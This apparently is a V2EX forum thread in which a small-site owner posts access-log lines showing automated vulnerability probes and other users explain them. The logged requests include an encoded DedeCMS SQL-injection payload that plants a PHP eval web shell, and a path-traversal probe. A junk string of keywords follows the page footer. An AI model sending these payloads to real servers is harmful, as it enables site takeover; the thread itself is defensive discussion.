网站服务器有异常 LOG,怀疑被攻击,帮忙看一下 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
gmodsimplegame
V2EX    服务器

网站服务器有异常 LOG,怀疑被攻击,帮忙看一下

  •  
  •   gmodsimplegame 2018-07-18 20:24:37 +08:00 2866 次点击
    这是一个创建于 2723 天前的主题,其中的信息能已经有所发展或是发生改变。
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "POST /include/dialog/select_soft_post.php HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/kqcpvfwieniq.php HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/read.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 169 "-" "python-requests/2.19.1" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /bbs/forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
    182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "POST /index.php?m=vod-search HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
    查了下 GET 的东西,都是一些漏洞?有什么好的建议吗,我的网站是查成绩的,就主页面一个多选项,选择一个选项后输入密码,密码在 JS 里面,混淆过,然后密码对了就跳转到一个文件夹里面(成绩页面),这样会影响安全吗?TX 云的建站主机
    10 条回复    2018-09-09 00:30:23 +08:00
    lcorange
        1
    lcorange  
       2018-07-18 20:31:20 +08:00   2
    这是有人恶意 ip 遍历,用已知漏洞挨个试。你只是不小心被扫到了,不是针对你,不影响安全。
    看着不舒服的话可以了解下 fail2ban
    gmodsimplegame
        2
    gmodsimplegame  
    OP
       2018-07-18 20:36:23 +08:00
    @lcorange emmm 建站主机可以吗,好像只能上传文件,不能敲命令的
    opengps
        3
    opengps  
       
    自动扫描攻击,我后台经常提示这类
    lcorange
        4
    lcorange  
       2018-07-18 20:40:06 +08:00
    @gmodsimplegame 那就不用管他了,做好备份,万一中招删了重建就可以了。
    gmodsimplegame
        5
    gmodsimplegame  
    OP
       2018-07-18 20:43:29 +08:00
    okk
    letitbesqzr
        6
    letitbesqzr  
       2018-07-18 21:14:09 +08:00
    自动扫描而已,很多的,不用担心, 比如 /plus/download.php 这个,dedecms 的一个漏洞
    abc612008
        7
    abc612008  
       2018-07-24 11:19:02 +08:00 via Android
    密码存 JS 里...?
    gmodsimplegame
        8
    gmodsimplegame  
    OP
       2018-09-08 08:47:11 +08:00
    @abc612008 小网站,也就输入一个密码然后跳转到另一个 html,班级里做的玩玩的,我除了 JS 混淆没什么方法存密码了...有什么好的建议吗?还是说用 MySQL
    abc612008
        9
    abc612008  
       2018-09-08 19:34:40 +08:00   1
    密码是绝对不可以发到前端的,要在后端里比对。前端的混淆除了拖延破解时间以外没其他意义。
    gmodsimplegame
        10
    gmodsimplegame  
    OP
       2018-09-09 00:30:23 +08:00
    @abc612008 行吧,那以后我就用 mysql,谢谢了
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2311 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 23ms UTC 10:07 PVG 18:07 LAX 02:07 JFK 05:07
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86